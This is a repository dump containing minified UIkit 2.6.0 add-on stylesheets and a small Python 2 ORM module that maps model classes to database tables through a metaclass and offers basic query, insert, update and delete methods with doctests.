a:focus{background-color:#ddd;color:#444;outline:0}.uk-datepicker-table a:active{background-color:#ccc;color:#444}.uk-datepicker-table a.uk-active{background:#00a8e6;color:#fff}.uk-markdownarea-navbar{background:#eee}.uk-markdownarea-navbar:before,.uk-markdownarea-navbar:after{content:" ";display:table}.uk-markdownarea-navbar:after{clear:both}.uk-markdownarea-navbar-nav{margin:0;padding:0;list-style:none;float:left}.uk-markdownarea-navbar-nav>li{float:left}.uk-markdownarea-navbar-nav>li>a{display:block;-moz-box-sizing:border-box;box-sizing:border-box;text-decoration:none;height:40px;padding:0 15px;line-height:40px;color:#444;font-size:11px;cursor:pointer}.uk-markdownarea-navbar-nav>li:hover>a,.uk-markdownarea-navbar-nav>li>a:focus{background-color:#f5f5f5;color:#444;outline:0}.uk-markdownarea-navbar-nav>li>a:active{background-color:#ddd;color:#444}.uk-markdownarea-navbar-nav>li.uk-active>a{background-color:#f5f5f5;color:#444}.uk-markdownarea-navbar-flip{float:right}[data-mode=split] .uk-markdown-button-markdown,[data-mode=split] .uk-markdown-button-preview{display:none}.uk-markdownarea-content{border-left:1px solid #ddd;border-right:1px solid #ddd;border-bottom:1px solid #ddd;background:#fff}.uk-markdownarea-content:before,.uk-markdownarea-content:after{content:" ";display:table}.uk-markdownarea-content:after{clear:both}.uk-markdownarea-fullscreen{position:fixed;top:0;left:0;right:0;bottom:0;z-index:990}.uk-markdownarea-fullscreen .uk-markdownarea-content{position:absolute;top:40px;left:0;right:0;bottom:0}.uk-markdownarea-fullscreen .uk-icon-expand:before{content:"\f066"}.uk-markdownarea-code,.uk-markdownarea-preview{-moz-box-sizing:border-box;box-sizing:border-box}.uk-markdownarea-preview{padding:20px;overflow-y:scroll}[data-mode=tab][data-active-tab=code] .uk-markdownarea-preview,[data-mode=tab][data-active-tab=preview] .uk-markdownarea-code{display:none}[data-mode=split] .uk-markdownarea-code,[data-mode=split] .uk-markdownarea-preview{float:left;width:50%}[data-mode=split] .uk-markdownarea-code{border-right:1px solid #eee}.uk-markdownarea .CodeMirror{padding:10px;-moz-box-sizing:border-box;box-sizing:border-box}.uk-notify{position:fixed;top:10px;left:10px;z-index:980;-moz-box-sizing:border-box;box-sizing:border-box;width:350px}.uk-notify-top-right,.uk-notify-bottom-right{left:auto;right:10px}.uk-notify-top-center,.uk-notify-bottom-center{left:50%;margin-left:-175px}.uk-notify-bottom-left,.uk-notify-bottom-right,.uk-notify-bottom-center{top:auto;bottom:10px}@media (max-width:479px){.uk-notify{left:10px;right:10px;width:auto;margin:0}}.uk-notify-message{position:relative;margin-bottom:10px;padding:15px;background:#444;color:#fff;font-size:16px;line-height:22px;cursor:pointer}.uk-notify-message>.uk-close{visibility:hidden;float:right}.uk-notify-message:hover>.uk-close{visibility:visible}.uk-notify-message-primary{background:#ebf7fd;color:#2d7091}.uk-notify-message-success{background:#f2fae3;color:#659f13}.uk-notify-message-warning{background:#fffceb;color:#e28327}.uk-notify-message-danger{background:#fff1f0;color:#d85030}.uk-search{display:inline-block;position:relative;margin:0}.uk-search:before{content:"\f002";position:absolute;top:0;left:0;width:30px;line-height:30px;text-align:center;font-family:FontAwesome;font-size:14px;color:rgba(0,0,0,.2)}.uk-search-field{width:120px;height:30px;padding:0 30px;border:1px solid rgba(0,0,0,0);background:rgba(0,0,0,0);color:#444;-webkit-transition:all linear .2s;transition:all linear .2s;border-radius:0}input.uk-search-field{-webkit-appearance:none}.uk-search-field:-ms-input-placeholder{color:#999}.uk-search-field::-moz-placeholder{color:#999}.uk-search-field::-webkit-input-placeholder{color:#999}.uk-search-field::-ms-clear{display:none}.uk-search-field:focus{outline:0}.uk-search-field:focus,.uk-active .uk-search-field{width:180px}.uk-search-close{display:none;position:absolute;top:0;right:0;width:30px;line-height:30px;text-align:center;font-size:14px;color:rgba(0,0,0,.2);padding:0;border:0;-webkit-appearance:none;background:0 0}.uk-loading>.uk-search-close,.uk-active>.uk-search-close{display:block}.uk-search-close:after{display:block;content:"\f00d";font-family:FontAwesome}.uk-loading>.uk-search-close:after{content:"\f110";-webkit-animation:uk-spin 2s infinite linear;animation:uk-spin 2s infinite linear}.uk-dropdown-search{width:300px;margin-top:0;background:#f5f5f5;color:#444}.uk-open>.uk-dropdown-search{-webkit-animation:uk-slide-top-fixed .2s ease-in-out;animation:uk-slide-top-fixed .2s ease-in-out}.uk-navbar-flip .uk-dropdown-search{margin-top:5px;margin-right:-15px}.uk-nav-search>li>a{color:#444}.uk-nav-search>li.uk-active>a{background:#00a8e6;color:#fff;outline:0}.uk-nav-search .uk-nav-header{color:#999}.uk-nav-search .uk-nav-divider{border-top:1px solid #ddd}.uk-nav-search ul a{color:#07d}.uk-nav-search ul a:hover{color:#059}.uk-offcanvas .uk-search{display:block;margin:20px 15px}.uk-offcanvas .uk-search:before{color:#777}.uk-offcanvas .uk-search-field{width:100%;border-color:rgba(0,0,0,0);background:#1a1a1a;color:#ccc}.uk-offcanvas .uk-search-field:-ms-input-placeholder{color:#777}.uk-offcanvas .uk-search-field::-moz-placeholder{color:#777}.uk-offcanvas .uk-search-field::-webkit-input-placeholder{color:#777}.uk-sortable{padding:0;list-style:none}.uk-sortable-list{margin:0;padding-left:40px;list-style:none}.uk-sortable-list-dragged{position:absolute;z-index:1050;padding-left:0;pointer-events:none}.uk-sortable-item{margin-bottom:10px;padding:5px;background:#f5f5f5}.uk-sortable-placeholder{-moz-box-sizing:border-box;box-sizing:border-box;margin-bottom:10px;border:1px dashed #ddd}.uk-sortable-empty{min-height:40px}.uk-sortable-handle{display:inline-block;font-size:18px;color:#ddd}.uk-sortable-handle:hover{cursor:move}.uk-sortable-handle:after{content:"\f0c9";font-family:FontAwesome}.uk-sortable-moving,.uk-sortable-moving *{cursor:move}[data-sortable-action=toggle]{display:inline-block;color:#999;visibility:hidden}[data-sortable-action=toggle]:hover{color:#444;cursor:pointer}[data-sortable-action=toggle]:after{content:"\f147";font-family:FontAwesome}.uk-parent>.uk-sortable-item [data-sortable-action=toggle]{visibility:visible}.uk-collapsed>.uk-sortable-item [data-sortable-action=toggle]:after{content:"\f196"}.uk-collapsed .uk-sortable-list{display:none}.uk-sticky{z-index:980}.uk-dragover{box-shadow:0 0 20px rgba(100,100,100,.3)}


--------------------------------------------------------------------------------
/www/static/css/addons/uikit.almost-flat.addons.min.css:
--------------------------------------------------------------------------------
1 | /*! UIkit 2.6.0 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
2 | 
3 | .uk-dotnav{padding:0;list-style:none;font-size:0}.uk-dotnav>li{display:inline-block;font-size:1rem;vertical-align:top}.uk-dotnav>li:nth-child(n+2){margin-left:15px}.uk-dotnav>li>a{display:inline-block;-moz-box-sizing:content-box;box-sizing:content-box;width:20px;height:20px;border-radius:50%;background:rgba(50,50,50,.1);vertical-align:top;overflow:hidden;text-indent:-999%;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.uk-dotnav>li>a:hover,.uk-dotnav>li>a:focus{background:rgba(50,50,50,.4);outline:0}.uk-dotnav>li>a:active{background:rgba(50,50,50,.6)}.uk-dotnav>li.uk-active>a{background:rgba(50,50,50,.4);-webkit-transform:scale(1.3);transform:scale(1.3)}.uk-dotnav-vertical>li{display:block}.uk-dotnav-vertical>li:nth-child(n+2){margin-left:0;margin-top:15px}.uk-slidenav{display:inline-block;-moz-box-sizing:border-box;box-sizing:border-box;width:60px;height:60px;line-height:60px;color:rgba(50,50,50,.4);font-size:60px;text-align:center}.uk-slidenav:hover,.uk-slidenav:focus{outline:0;text-decoration:none;color:rgba(50,50,50,.7);cursor:pointer}.uk-slidenav:active{color:rgba(50,50,50,.9)}.uk-slidenav-previous:before{content:"\f104";font-family:FontAwesome}.uk-slidenav-next:before{content:"\f105";font-family:FontAwesome}.uk-slidenav-position{display:inline-block;-moz-box-sizing:border-box;box-sizing:border-box;max-width:100%;position:relative}.uk-slidenav-position .uk-slidenav{display:none;position:absolute;top:50%;margin-top:-30px}.uk-slidenav-position:hover .uk-slidenav{display:block}.uk-slidenav-position .uk-slidenav-previous{left:20px}.uk-slidenav-position .uk-slidenav-next{right:20px}.uk-form-file{position:relative;display:inline-block;vertical-align:middle;overflow:hidden}.uk-form-file input[type=file]{position:absolute;top:0;bottom:0;z-index:1;width:100%;opacity:0;cursor:pointer;left:0;font-size:500px}.uk-form-password{position:relative;display:inline-block;max-width:100%}.uk-form-password-toggle{display:block;position:absolute;top:50%;right:10px;margin-top:-6px;font-size:13px;line-height:13px;color:#999}.uk-form-password-toggle:hover{color:#999;text-decoration:none}.uk-form-password>input{padding-right:50px!important}.uk-placeholder{margin-bottom:15px;padding:20px;border:1px dashed #ddd;background:#fafafa;color:#444}*+.uk-placeholder{margin-top:15px}.uk-placeholder>:last-child{margin-bottom:0}.uk-placeholder-large{padding-top:80px;padding-bottom:80px}.uk-autocomplete{display:inline-block;vertical-align:middle;position:relative}.uk-nav-autocomplete>li>a{color:#444}.uk-nav-autocomplete>li.uk-active>a{background:#00a8e6;color:#fff;outline:0;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-nav-autocomplete .uk-nav-header{color:#999}.uk-nav-autocomplete .uk-nav-divider{border-top:1px solid #ddd}.uk-datepicker{width:auto}.uk-datepicker-nav{margin-bottom:15px;text-align:center;line-height:20px}.uk-datepicker-nav:before,.uk-datepicker-nav:after{content:" ";display:table}.uk-datepicker-nav:after{clear:both}.uk-datepicker-nav a{color:#444;text-decoration:none}.uk-datepicker-nav a:hover{color:#444}.uk-datepicker-previous{float:left}.uk-datepicker-next{float:right}.uk-datepicker-previous:after,.uk-datepicker-next:after{width:20px;font-family:FontAwesome}.uk-datepicker-previous:after{content:"\f053"}.uk-datepicker-next:after{content:"\f054"}.uk-datepicker-table{width:100%}.uk-datepicker-table th,.uk-datepicker-table td{padding:2px}.uk-datepicker-table th{font-size:12px}.uk-datepicker-table a{display:block;width:26px;line-height:24px;text-align:center;color:#444;text-decoration:none;border:1px solid transparent;border-radius:4px}a.uk-datepicker-table-muted{color:#999}.uk-datepicker-table a:hover,.uk-datepicker-table a:focus{background-color:#fafafa;color:#444;outline:0;border-color:rgba(0,0,0,.16);text-shadow:0 1px 0 #fff}.uk-datepicker-table a:active{background-color:#eee;color:#444}.uk-datepicker-table a.uk-active{background:#00a8e6;color:#fff;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-markdownarea-navbar{background:#f5f5f5;border:1px solid rgba(0,0,0,.06);border-top-left-radius:4px;border-top-right-radius:4px}.uk-markdownarea-navbar:before,.uk-markdownarea-navbar:after{content:" ";display:table}.uk-markdownarea-navbar:after{clear:both}.uk-markdownarea-navbar-nav{margin:0;padding:0;list-style:none;float:left}.uk-markdownarea-navbar-nav>li{float:left}.uk-markdownarea-navbar-nav>li>a{display:block;-moz-box-sizing:border-box;box-sizing:border-box;text-decoration:none;height:41px;padding:0 15px;line-height:40px;color:#444;font-size:11px;cursor:pointer;margin-top:-1px;margin-left:-1px;border:1px solid transparent;border-bottom-width:0;text-shadow:0 1px 0 #fff}.uk-markdownarea-navbar-nav>li:hover>a,.uk-markdownarea-navbar-nav>li>a:focus{background-color:#fafafa;color:#444;outline:0;position:relative;z-index:1;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.1)}.uk-markdownarea-navbar-nav>li>a:active{background-color:#eee;color:#444;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.2)}.uk-markdownarea-navbar-nav>li.uk-active>a{background-color:#fafafa;color:#444;border-left-color:rgba(0,0,0,.1);border-right-color:rgba(0,0,0,.1);border-top-color:rgba(0,0,0,.1)}.uk-markdownarea-navbar-flip{float:right}[data-mode=split] .uk-markdown-button-markdown,[data-mode=split] .uk-markdown-button-preview{display:none}.uk-markdownarea-content{border-left:1px solid #ddd;border-right:1px solid #ddd;border-bottom:1px solid #ddd;background:#fff;border-bottom-left-radius:4px;border-bottom-right-radius:4px}.uk-markdownarea-content:before,.uk-markdownarea-content:after{content:" ";display:table}.uk-markdownarea-content:after{clear:both}.uk-markdownarea-fullscreen{position:fixed;top:0;left:0;right:0;bottom:0;z-index:990}.uk-markdownarea-fullscreen .uk-markdownarea-content{position:absolute;top:41px;left:0;right:0;bottom:0}.uk-markdownarea-fullscreen .uk-icon-expand:before{content:"\f066"}.uk-markdownarea-code,.uk-markdownarea-preview{-moz-box-sizing:border-box;box-sizing:border-box}.uk-markdownarea-preview{padding:20px;overflow-y:scroll}[data-mode=tab][data-active-tab=code] .uk-markdownarea-preview,[data-mode=tab][data-active-tab=preview] .uk-markdownarea-code{display:none}[data-mode=split] .uk-markdownarea-code,[data-mode=split] .uk-markdownarea-preview{float:left;width:50%}[data-mode=split] .uk-markdownarea-code{border-right:1px solid #eee}.uk-markdownarea .CodeMirror{padding:10px;-moz-box-sizing:border-box;box-sizing:border-box}.uk-markdownarea-navbar-nav:first-child>li:first-child>a{border-top-left-radius:4px}.uk-markdownarea-navbar-flip .uk-markdownarea-navbar-nav>li>a{margin-left:0;margin-right:-1px}.uk-markdownarea-navbar-flip .uk-markdownarea-navbar-nav:first-child>li:first-child>a{border-top-left-radius:0}.uk-markdownarea-navbar-flip .uk-markdownarea-navbar-nav:last-child>li:last-child>a{border-top-right-radius:4px}.uk-markdownarea-fullscreen .uk-markdownarea-navbar{border-top:none;border-left:none;border-right:none;border-radius:0}.uk-markdownarea-fullscreen .uk-markdownarea-content{border:none;border-radius:0}.uk-markdownarea-fullscreen .uk-markdownarea-navbar-nav>li>a{border-radius:0!important}.uk-notify{position:fixed;top:10px;left:10px;z-index:980;-moz-box-sizing:border-box;box-sizing:border-box;width:350px}.uk-notify-top-right,.uk-notify-bottom-right{left:auto;right:10px}.uk-notify-top-center,.uk-notify-bottom-center{left:50%;margin-left:-175px}.uk-notify-bottom-left,.uk-notify-bottom-right,.uk-notify-bottom-center{top:auto;bottom:10px}@media (max-width:479px){.uk-notify{left:10px;right:10px;width:auto;margin:0}}.uk-notify-message{position:relative;margin-bottom:10px;padding:15px;background:#444;color:#fff;font-size:16px;line-height:22px;cursor:pointer;border:1px solid #444;border-radius:4px}.uk-notify-message>.uk-close{visibility:hidden;float:right}.uk-notify-message:hover>.uk-close{visibility:visible}.uk-notify-message-primary{background:#ebf7fd;color:#2d7091;border-color:rgba(45,112,145,.3)}.uk-notify-message-success{background:#f2fae3;color:#659f13;border-color:rgba(101,159,19,.3)}.uk-notify-message-warning{background:#fffceb;color:#e28327;border-color:rgba(226,131,39,.3)}.uk-notify-message-danger{background:#fff1f0;color:#d85030;border-color:rgba(216,80,48,.3)}.uk-search{display:inline-block;position:relative;margin:0}.uk-search:before{content:"\f002";position:absolute;top:0;left:0;width:30px;line-height:30px;text-align:center;font-family:FontAwesome;font-size:14px;color:rgba(0,0,0,.2)}.uk-search-field{width:120px;height:30px;padding:0 30px;border:1px solid rgba(0,0,0,0);background:rgba(0,0,0,0);color:#444;-webkit-transition:all linear .2s;transition:all linear .2s;border-radius:0}input.uk-search-field{-webkit-appearance:none}.uk-search-field:-ms-input-placeholder{color:#999}.uk-search-field::-moz-placeholder{color:#999}.uk-search-field::-webkit-input-placeholder{color:#999}.uk-search-field::-ms-clear{display:none}.uk-search-field:focus{outline:0}.uk-search-field:focus,.uk-active .uk-search-field{width:180px}.uk-search-close{display:none;position:absolute;top:0;right:0;width:30px;line-height:30px;text-align:center;font-size:14px;color:rgba(0,0,0,.2);padding:0;border:0;-webkit-appearance:none;background:0 0}.uk-loading>.uk-search-close,.uk-active>.uk-search-close{display:block}.uk-search-close:after{display:block;content:"\f00d";font-family:FontAwesome}.uk-loading>.uk-search-close:after{content:"\f110";-webkit-animation:uk-spin 2s infinite linear;animation:uk-spin 2s infinite linear}.uk-dropdown-search{width:300px;margin-top:0;background:#fff;color:#444}.uk-open>.uk-dropdown-search{-webkit-animation:uk-slide-top-fixed .2s ease-in-out;animation:uk-slide-top-fixed .2s ease-in-out}.uk-navbar-flip .uk-dropdown-search{margin-top:12px;margin-right:-16px}.uk-nav-search>li>a{color:#444}.uk-nav-search>li.uk-active>a{background:#00a8e6;color:#fff;outline:0;box-shadow:inset 0 0 5px rgba(0,0,0,.05);text-shadow:0 -1px 0 rgba(0,0,0,.1)}.uk-nav-search .uk-nav-header{color:#999}.uk-nav-search .uk-nav-divider{border-top:1px solid #ddd}.uk-nav-search ul a{color:#07d}.uk-nav-search ul a:hover{color:#059}.uk-offcanvas .uk-search{display:block;margin:20px 15px}.uk-offcanvas .uk-search:before{color:#777}.uk-offcanvas .uk-search-field{width:100%;border-color:rgba(0,0,0,0);background:#1a1a1a;color:#ccc}.uk-offcanvas .uk-search-field:-ms-input-placeholder{color:#777}.uk-offcanvas .uk-search-field::-moz-placeholder{color:#777}.uk-offcanvas .uk-search-field::-webkit-input-placeholder{color:#777}.uk-sortable{padding:0;list-style:none}.uk-sortable-list{margin:0;padding-left:40px;list-style:none}.uk-sortable-list-dragged{position:absolute;z-index:1050;padding-left:0;pointer-events:none}.uk-sortable-item{margin-bottom:10px;padding:5px;background:#f5f5f5;border-radius:4px;border:1px solid rgba(0,0,0,.06);text-shadow:0 1px 0 #fff}.uk-sortable-placeholder{-moz-box-sizing:border-box;box-sizing:border-box;margin-bottom:10px;border:1px dashed #ddd}.uk-sortable-empty{min-height:40px}.uk-sortable-handle{display:inline-block;font-size:18px;color:#ddd}.uk-sortable-handle:hover{cursor:move}.uk-sortable-handle:after{content:"\f0c9";font-family:FontAwesome}.uk-sortable-moving,.uk-sortable-moving *{cursor:move}[data-sortable-action=toggle]{display:inline-block;color:#999;visibility:hidden}[data-sortable-action=toggle]:hover{color:#444;cursor:pointer}[data-sortable-action=toggle]:after{content:"\f147";font-family:FontAwesome}.uk-parent>.uk-sortable-item [data-sortable-action=toggle]{visibility:visible}.uk-collapsed>.uk-sortable-item [data-sortable-action=toggle]:after{content:"\f196"}.uk-collapsed .uk-sortable-list{display:none}.uk-sticky{z-index:980}.uk-dragover{box-shadow:0 0 20px rgba(100,100,100,.3)}


--------------------------------------------------------------------------------
/www/transwarp/orm.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | 
  4 | __author__ = 'avfisher'
  5 | 
  6 | '''
  7 | Database operation module. This module is independent with web module.
  8 | '''
  9 | 
 10 | import time, logging
 11 | 
 12 | import db
 13 | 
 14 | class Field(object):
 15 | 
 16 |     _count = 0
 17 | 
 18 |     def __init__(self, **kw):
 19 |         self.name = kw.get('name', None)
 20 |         self._default = kw.get('default', None)
 21 |         self.primary_key = kw.get('primary_key', False)
 22 |         self.nullable = kw.get('nullable', False)
 23 |         self.updatable = kw.get('updatable', True)
 24 |         self.insertable = kw.get('insertable', True)
 25 |         self.ddl = kw.get('ddl', '')
 26 |         self._order = Field._count
 27 |         Field._count = Field._count + 1
 28 | 
 29 |     @property
 30 |     def default(self):
 31 |         d = self._default
 32 |         return d() if callable(d) else d
 33 | 
 34 |     def __str__(self):
 35 |         s = ['<%s:%s,%s,default(%s),' % (self.__class__.__name__, self.name, self.ddl, self._default)]
 36 |         self.nullable and s.append('N')
 37 |         self.updatable and s.append('U')
 38 |         self.insertable and s.append('I')
 39 |         s.append('>')
 40 |         return ''.join(s)
 41 | 
 42 | class StringField(Field):
 43 | 
 44 |     def __init__(self, **kw):
 45 |         if not 'default' in kw:
 46 |             kw['default'] = ''
 47 |         if not 'ddl' in kw:
 48 |             kw['ddl'] = 'varchar(255)'
 49 |         super(StringField, self).__init__(**kw)
 50 | 
 51 | class IntegerField(Field):
 52 | 
 53 |     def __init__(self, **kw):
 54 |         if not 'default' in kw:
 55 |             kw['default'] = 0
 56 |         if not 'ddl' in kw:
 57 |             kw['ddl'] = 'bigint'
 58 |         super(IntegerField, self).__init__(**kw)
 59 | 
 60 | class FloatField(Field):
 61 | 
 62 |     def __init__(self, **kw):
 63 |         if not 'default' in kw:
 64 |             kw['default'] = 0.0
 65 |         if not 'ddl' in kw:
 66 |             kw['ddl'] = 'real'
 67 |         super(FloatField, self).__init__(**kw)
 68 | 
 69 | class DatetimeField(Field):
 70 | 
 71 |     def __init__(self, **kw):
 72 |         if not 'default' in kw:
 73 |             kw['default'] = 0.0
 74 |         if not 'ddl' in kw:
 75 |             kw['ddl'] = 'datetime'
 76 |         super(DatetimeField, self).__init__(**kw)
 77 | 
 78 | class BooleanField(Field):
 79 | 
 80 |     def __init__(self, **kw):
 81 |         if not 'default' in kw:
 82 |             kw['default'] = False
 83 |         if not 'ddl' in kw:
 84 |             kw['ddl'] = 'bool'
 85 |         super(BooleanField, self).__init__(**kw)
 86 | 
 87 | class TextField(Field):
 88 | 
 89 |     def __init__(self, **kw):
 90 |         if not 'default' in kw:
 91 |             kw['default'] = ''
 92 |         if not 'ddl' in kw:
 93 |             kw['ddl'] = 'text'
 94 |         super(TextField, self).__init__(**kw)
 95 | 
 96 | class LongTextField(Field):
 97 | 
 98 |     def __init__(self, **kw):
 99 |         if not 'default' in kw:
100 |             kw['default'] = ''
101 |         if not 'ddl' in kw:
102 |             kw['ddl'] = 'longtext'
103 |         super(LongTextField, self).__init__(**kw)
104 | 
105 | class BlobField(Field):
106 | 
107 |     def __init__(self, **kw):
108 |         if not 'default' in kw:
109 |             kw['default'] = ''
110 |         if not 'ddl' in kw:
111 |             kw['ddl'] = 'blob'
112 |         super(BlobField, self).__init__(**kw)
113 | 
114 | class VersionField(Field):
115 | 
116 |     def __init__(self, name=None):
117 |         super(VersionField, self).__init__(name=name, default=0, ddl='bigint')
118 | 
119 | _triggers = frozenset(['pre_insert', 'pre_update', 'pre_delete'])
120 | 
121 | def _gen_sql(table_name, mappings):
122 |     pk = None
123 |     sql = ['-- generating SQL for %s:' % table_name, 'create table `%s` (' % table_name]
124 |     for f in sorted(mappings.values(), lambda x, y: cmp(x._order, y._order)):
125 |         if not hasattr(f, 'ddl'):
126 |             raise StandardError('no ddl in field "%s".' % n)
127 |         ddl = f.ddl
128 |         nullable = f.nullable
129 |         if f.primary_key:
130 |             pk = f.name
131 |         sql.append(nullable and '  `%s` %s,' % (f.name, ddl) or '  `%s` %s not null,' % (f.name, ddl))
132 |     sql.append('  primary key(`%s`)' % pk)
133 |     sql.append(');')
134 |     return '\n'.join(sql)
135 | 
136 | class ModelMetaclass(type):
137 |     '''
138 |     Metaclass for model objects.
139 |     '''
140 |     def __new__(cls, name, bases, attrs):
141 |         # skip base Model class:
142 |         if name=='Model':
143 |             return type.__new__(cls, name, bases, attrs)
144 | 
145 |         # store all subclasses info:
146 |         if not hasattr(cls, 'subclasses'):
147 |             cls.subclasses = {}
148 |         if not name in cls.subclasses:
149 |             cls.subclasses[name] = name
150 |         else:
151 |             logging.warning('Redefine class: %s' % name)
152 | 
153 |         logging.info('Scan ORMapping %s...' % name)
154 |         mappings = dict()
155 |         primary_key = None
156 |         for k, v in attrs.iteritems():
157 |             if isinstance(v, Field):
158 |                 if not v.name:
159 |                     v.name = k
160 |                 logging.info('Found mapping: %s => %s' % (k, v))
161 |                 # check duplicate primary key:
162 |                 if v.primary_key:
163 |                     if primary_key:
164 |                         raise TypeError('Cannot define more than 1 primary key in class: %s' % name)
165 |                     if v.updatable:
166 |                         logging.warning('NOTE: change primary key to non-updatable.')
167 |                         v.updatable = False
168 |                     if v.nullable:
169 |                         logging.warning('NOTE: change primary key to non-nullable.')
170 |                         v.nullable = False
171 |                     primary_key = v
172 |                 mappings[k] = v
173 |         # check exist of primary key:
174 |         if not primary_key:
175 |             raise TypeError('Primary key not defined in class: %s' % name)
176 |         for k in mappings.iterkeys():
177 |             attrs.pop(k)
178 |         if not '__table__' in attrs:
179 |             attrs['__table__'] = name.lower()
180 |         attrs['__mappings__'] = mappings
181 |         attrs['__primary_key__'] = primary_key
182 |         attrs['__sql__'] = lambda self: _gen_sql(attrs['__table__'], mappings)
183 |         for trigger in _triggers:
184 |             if not trigger in attrs:
185 |                 attrs[trigger] = None
186 |         return type.__new__(cls, name, bases, attrs)
187 | 
188 | class Model(dict):
189 |     '''
190 |     Base class for ORM.
191 | 
192 |     >>> class User(Model):
193 |     ...     id = IntegerField(primary_key=True)
194 |     ...     name = StringField()
195 |     ...     email = StringField(updatable=False)
196 |     ...     passwd = StringField(default=lambda: '******')
197 |     ...     last_modified = FloatField()
198 |     ...     def pre_insert(self):
199 |     ...         self.last_modified = time.time()
200 |     >>> u = User(id=10190, name='Michael', email='orm@db.org')
201 |     >>> r = u.insert()
202 |     >>> u.email
203 |     'orm@db.org'
204 |     >>> u.passwd
205 |     '******'
206 |     >>> u.last_modified > (time.time() - 2)
207 |     True
208 |     >>> f = User.get(10190)
209 |     >>> f.name
210 |     u'Michael'
211 |     >>> f.email
212 |     u'orm@db.org'
213 |     >>> f.email = 'changed@db.org'
214 |     >>> r = f.update() # change email but email is non-updatable!
215 |     >>> len(User.find_all())
216 |     1
217 |     >>> g = User.get(10190)
218 |     >>> g.email
219 |     u'orm@db.org'
220 |     >>> r = g.delete()
221 |     >>> len(db.select('select * from user where id=10190'))
222 |     0
223 |     >>> import json
224 |     >>> print User().__sql__()
225 |     -- generating SQL for user:
226 |     create table `user` (
227 |       `id` bigint not null,
228 |       `name` varchar(255) not null,
229 |       `email` varchar(255) not null,
230 |       `passwd` varchar(255) not null,
231 |       `last_modified` real not null,
232 |       primary key(`id`)
233 |     );
234 |     '''
235 |     __metaclass__ = ModelMetaclass
236 | 
237 |     def __init__(self, **kw):
238 |         super(Model, self).__init__(**kw)
239 | 
240 |     def __getattr__(self, key):
241 |         try:
242 |             return self[key]
243 |         except KeyError:
244 |             raise AttributeError(r"'Dict' object has no attribute '%s'" % key)
245 | 
246 |     def __setattr__(self, key, value):
247 |         self[key] = value
248 | 
249 |     @classmethod
250 |     def get(cls, pk):
251 |         '''
252 |         Get by primary key.
253 |         '''
254 |         d = db.select_one('select * from %s where %s=?' % (cls.__table__, cls.__primary_key__.name), pk)
255 |         return cls(**d) if d else None
256 | 
257 |     @classmethod
258 |     def find_first(cls, where, *args):
259 |         '''
260 |         Find by where clause and return one result. If multiple results found,
261 |         only the first one returned. If no result found, return None.
262 |         '''
263 |         d = db.select_one('select * from %s %s' % (cls.__table__, where), *args)
264 |         return cls(**d) if d else None
265 | 
266 |     @classmethod
267 |     def find_all(cls, *args):
268 |         '''
269 |         Find all and return list.
270 |         '''
271 |         L = db.select('select * from `%s`' % cls.__table__)
272 |         return [cls(**d) for d in L]
273 | 
274 |     @classmethod
275 |     def find_by(cls, where, *args):
276 |         '''
277 |         Find by where clause and return list.
278 |         '''
279 |         L = db.select('select * from `%s` %s' % (cls.__table__, where), *args)
280 |         return [cls(**d) for d in L]
281 | 
282 |     @classmethod
283 |     def count_all(cls):
284 |         '''
285 |         Find by 'select count(pk) from table' and return integer.
286 |         '''
287 |         return db.select_int('select count(`%s`) from `%s`' % (cls.__primary_key__.name, cls.__table__))
288 | 
289 |     @classmethod
290 |     def count_by(cls, where, *args):
291 |         '''
292 |         Find by 'select count(pk) from table where ... ' and return int.
293 |         '''
294 |         return db.select_int('select count(`%s`) from `%s` %s' % (cls.__primary_key__.name, cls.__table__, where), *args)
295 | 
296 |     def update(self):
297 |         self.pre_update and self.pre_update()
298 |         L = []
299 |         args = []
300 |         for k, v in self.__mappings__.iteritems():
301 |             if v.updatable:
302 |                 if hasattr(self, k):
303 |                     arg = getattr(self, k)
304 |                 else:
305 |                     arg = v.default
306 |                     setattr(self, k, arg)
307 |                 L.append('`%s`=?' % k)
308 |                 args.append(arg)
309 |         pk = self.__primary_key__.name
310 |         args.append(getattr(self, pk))
311 |         db.update('update `%s` set %s where %s=?' % (self.__table__, ','.join(L), pk), *args)
312 |         return self
313 | 
314 |     def delete(self):
315 |         self.pre_delete and self.pre_delete()
316 |         pk = self.__primary_key__.name
317 |         args = (getattr(self, pk), )
318 |         db.update('delete from `%s` where `%s`=?' % (self.__table__, pk), *args)
319 |         return self
320 | 
321 |     def insert(self):
322 |         self.pre_insert and self.pre_insert()
323 |         params = {}
324 |         for k, v in self.__mappings__.iteritems():
325 |             if v.insertable:
326 |                 if not hasattr(self, k):
327 |                     setattr(self, k, v.default)
328 |                 params[v.name] = getattr(self, k)
329 |         db.insert('%s' % self.__table__, **params)
330 |         return self
331 | 
332 | if __name__=='__main__':
333 |     logging.basicConfig(level=logging.DEBUG)
334 |     db.create_engine('www-data', 'www-data', 'test')
335 |     db.update('drop table if exists user')
336 |     db.update('create table user (id int primary key, name text, email text, passwd text, last_modified real)')
337 |     import doctest
338 |     doctest.testmod()
339 | 


--------------------------------------------------------------------------------
/www/static/css/addons/uikit.gradient.addons.min.css:
--------------------------------------------------------------------------------
1 | /*! UIkit 2.6.0 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
2 | 
